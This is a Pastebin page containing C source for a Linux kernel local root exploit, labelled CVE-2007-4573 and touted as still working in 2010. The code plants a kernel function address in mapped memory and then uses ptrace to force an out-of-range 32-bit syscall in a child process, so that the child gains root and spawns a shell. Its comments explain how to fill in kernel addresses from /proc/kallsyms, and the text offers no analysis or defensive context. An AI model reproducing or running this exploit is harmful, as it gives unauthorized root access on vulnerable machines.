Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // CVE-2007-4573 mod -yes,this CAN exploit 2010!
- #include <sys/ptrace.h>
- #include <sys/user.h>
- #include <sys/types.h>
- #include <sys/wait.h>
- #include <unistd.h>
- #include <stdio.h>
- #include <sys/mman.h>
- #include <string.h>
- #include <stdlib.h>
- #include <stddef.h>
- /*
- * Replace these with the values of `ia32_sys_call_table' and
- * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
- */
- #define syscall_table 0xffffffff8044b8a0
- #define set_user 0xffffffff8028d785
- #define offset (1L << 32)
- #define landing (syscall_table + 8*offset)
- int main() {
- if((signed long)mmap((void*)(landing&~0xFFF), 4096,
- PROT_READ|PROT_EXEC|PROT_WRITE,
- MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
- 0, 0) < 0) { // can make this 'not necessary' - use the other 2010 and some 2009 to work THAT out ;)
- perror("mmap");
- exit(-1);
- }
- *(long*)landing = set_user;
- pid_t child;
- child = fork();
- if(child == 0) {
- ptrace(PTRACE_TRACEME, 0, NULL, NULL);
- kill(getpid(), SIGSTOP);
- __asm__("movl $0, %ebx\n\t"
- "int $0x80\n");
- execl("/bin/sh", "/bin/sh", NULL);
- } else {
- wait(NULL);
- ptrace(PTRACE_SYSCALL, child, NULL, NULL);
- wait(NULL);
- ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
- (void*)offset);
- ptrace(PTRACE_DETACH, child, NULL, NULL);
- wait(NULL);
- /*
- use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
- and then detach and let it run.
- */
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement